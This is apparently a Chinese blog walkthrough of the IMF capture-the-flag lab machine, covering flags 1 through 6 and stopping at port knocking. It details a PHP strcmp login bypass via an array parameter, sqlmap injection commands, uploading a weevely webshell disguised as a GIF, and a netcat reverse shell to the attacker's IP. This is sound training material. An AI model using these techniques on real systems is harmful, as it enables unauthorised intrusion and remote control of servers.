IMF

靶机
字数统计: 427字   |   阅读时长≈ 1分钟

0x00 信息收集

image-20200314185633352

就一个80

0x01 flag1

看源码就行了

image-20200314185815358

base64解这个flag 提示我们allthefilesimage-20200314185917680

0x02 flag2

我们再细看 这几行js有点怪 拼起来得到flag2 提示imfadministrator

image-20200314190308552

image-20200314190426313

image-20200314190511844

0x03 flag3

根据给的路径发现登陆页面
根据回显发现rmichaels用户名存在
查看源码发现密码使用硬编码
如果是硬编码的,我们猜测他使用了strcmp函数,strcmp()是对于相等的字符串返回0,不同的字符串返回非0,但如果比较非字符串,strcmp()将返回null。在php中null==0是true。使得数组看起来与硬编码的密码字符串匹配。
所以我们此处传一个数组,将pass字段重命名为pass[]。
用户名使用rmichaels,将pass字段重命名为pass[]。

image-20200314220716954

image-20200314220834567

image-20200314220905157

0x04 flag4

进到IMF里pagename参数有个upload有注入 sqlmap走起

image-20200314221515461

sqlmap -u “http://192.168.0.103/imfadministrator/cms.php?pagename=upload" –cookie “PHPSESSID=dfij6638dhhltl0vplg5q71um3” –dbs

image-20200314222022401

跑admin
sqlmap -u “http://192.168.0.103/imfadministrator/cms.php?pagename=upload" –cookie “PHPSESSID=dfij6638dhhltl0vplg5q71um3” -D admin –tables
image-20200314222132550

新页面
image-20200314222241091

image-20200314222527908

扫扫更健康

image-20200314233209089

解码
image-20200314222659426

0x05 flag5

访问下解码后的php

image-20200314222754725

亲自试水 常规上传别试了 上weevely吧
weevely generate t00r ~/shell.php
image-20200314223138650
改个文件头 文件后缀也变gif
image-20200314223316403
上传成功

image-20200314224722194

源码里这个就是文件落地后的名字
image-20200314225025848

连接后查看flag5 解码
image-20200314225510979
提示agentservices

0x06 flag6

nc去弄个交互式shell
攻击机:nc -lvp 2333
靶机::backdoor_reversetcp 192.168.0.106 2333
image-20200314230121345

ps -aux看看进程 发现有knock进程怪不得开始信息收集时候只有80端口
image-20200314230358950
再看看网络 netstat -antp 发现个7788

image-20200314230649667

进一步了解下 之前的flag5提示我们也是代理

image-20200314230734515

find全局查agent文件 打开两个

image-20200314231323432

根据敲门密码 敲端口

image-20200314232557766

打赏
  • 版权声明: 本博客所有文章除特别声明外,均采用 Apache License 2.0 许可协议。转载请注明出处!
  • © 2015-2020 Loki
  • Powered by Hexo Theme Ayer
  • PV: UV:

请我喝杯咖啡吧~

支付宝
微信